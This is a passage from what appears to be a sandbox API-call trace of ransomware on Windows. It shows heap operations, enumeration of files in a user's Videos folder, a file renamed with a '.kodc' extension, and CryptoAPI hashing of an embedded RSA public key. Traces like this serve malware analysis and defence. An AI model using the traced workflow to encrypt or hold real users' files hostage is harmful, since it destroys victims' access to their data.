(HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0100.339] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.339] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.339] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0100.339] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0100.340] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0100.340] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7c98 [0100.340] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0100.340] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0100.340] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0100.340] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7c68 [0100.340] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0100.340] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0100.340] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.340] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0100.340] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0100.340] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0100.340] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0100.340] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7cb0 [0100.340] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0100.340] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7a28 [0100.340] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.340] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0100.340] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0100.340] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0100.340] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0100.340] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0100.340] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7c80 | out: hHeap=0x630000) returned 1 [0100.340] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7c80 [0100.341] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x88a2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.341] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0100.341] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0100.341] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0100.341] CloseHandle (hObject=0x5cc) returned 1 [0100.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x32c2cb0 [0100.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x32d0db8 [0100.351] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\lxTxgdj8XUNpt.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\lxtxgdj8xunpt.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\lxTxgdj8XUNpt.swf.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\lxtxgdj8xunpt.swf.kodc")) returned 1 [0100.353] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe38c25f0, ftCreationTime.dwHighDateTime=0x1d5ba15, ftLastAccessTime.dwLowDateTime=0xcdaf6d20, ftLastAccessTime.dwHighDateTime=0x1d5be1e, ftLastWriteTime.dwLowDateTime=0xcdaf6d20, ftLastWriteTime.dwHighDateTime=0x1d5be1e, nFileSizeHigh=0x0, nFileSizeLow=0x873f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="oVsvZ7ftfd4dfii6-W7M.flv", cAlternateFileName="OVSVZ7~1.FLV")) returned 1 [0100.353] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0100.353] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0100.353] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\oVsvZ7ftfd4dfii6-W7M.flv") returned=".flv" [0100.353] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\oVsvZ7ftfd4dfii6-W7M.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ovsvz7ftfd4dfii6-w7m.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0100.353] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=34623) returned 1 [0100.353] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0100.358] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x8719, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.358] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0100.359] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.359] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x873f, lpOverlapped=0x0) returned 1 [0100.359] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.359] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0100.359] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.359] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.359] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693378) returned 1 [0100.361] CryptCreateHash (in: hProv=0x693378, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0100.361] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0100.361] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0100.361] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0100.361] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0100.361] GetLastError () returned 0x0 [0100.361] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0100.361] CryptReleaseContext (hProv=0x693378, dwFlags=0x0) returned 1 [0100.361] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.361] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0100.361] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0100.362] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.362] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0100.362] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.362] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.362] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8740) returned 0x9ba6d90 [0100.362] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0100.362] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.362] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0100.362] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.362] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0100.362] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0100.362] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c5c8 [0100.362] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7c50 [0100.362] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c610 [0100.362] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7c68 [0100.362] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7c98 [0100.363] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0100.363] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7cb0 [0100.363] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0100.363] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0100.363] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0100.363] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0100.363] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7c98 | out: hHeap=0x630000) returned 1 [0100.363] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7cb0 | out: hHeap=0x630000) returned 1 [0100.363] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0100.363] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0100.363] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0100.363] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0100.363] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0100.363] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7cb0 [0100.363] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0100.363] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7c98 [0100.363] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0100.364] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c658 [0100.364] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0100.364] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0100.364] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0100.364] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c770 [0100.364] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0100.364] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0100.364] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0100.364] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7cb0 | out: hHeap=0x630000) returned 1 [0100.364] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.364] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7c98 | out: hHeap=0x630000) returned 1 [0100.364] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0100.364] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0100.364] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0100.364] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0100.364] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0100.364] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.364] GetCurrentThreadId () returned 0x42c [0100.364] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0100.364] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba6ae8 [0100.365] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0100.365] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0100.365] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0100.365] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0100.365] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.365] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0100.365] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.365] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.365] GetCurrentThreadId () returned 0x42c [0100.365] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.365] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.365] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0100.365] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.365] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.365] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.365] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.365] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0100.365] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0100.365] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0100.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0100.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0100.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0100.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0100.366] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0100.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0100.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0100.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0100.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0100.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7c98 [0100.366] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0100.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0100.366] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.367] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0100.367] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0100.367] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0100.367] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7cb0 [0100.367] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0100.367] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0100.367] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0100.367] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7c80 [0100.367] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0100.367] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0100.367] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.367] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.367] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0100.367] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0100.368] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0100.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7cc8 [0100.368] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb79c8 [0100.368] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0100.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0100.368] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0100.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0100.368] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0100.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0100.368] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7c98 | out: hHeap=0x630000) returned 1 [0100.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7c98 [0100.368] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0100.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0100.368] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0100.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c658 [0100.368] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0100.369] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0100.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c428 [0100.369] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0100.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c540 [0100.369] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7c98 | out: hHeap=0x630000) returned 1 [0100.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x6948b0 [0100.369] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0100.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0100.369] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.369] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693378 | out: hHeap=0x630000) returned 1 [0100.369] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0100.369] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0100.369] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0100.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0100.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6948b0 | out: hHeap=0x630000) returned 1 [0100.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0100.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0100.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7cc8 | out: hHeap=0x630000) returned 1 [0100.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0100.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0100.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7cb0 | out: hHeap=0x630000) returned 1 [0100.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7c80 | out: hHeap=0x630000) returned 1 [0100.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0100.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0100.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0100.370] HeapFree (in: hHeap=0x630000, 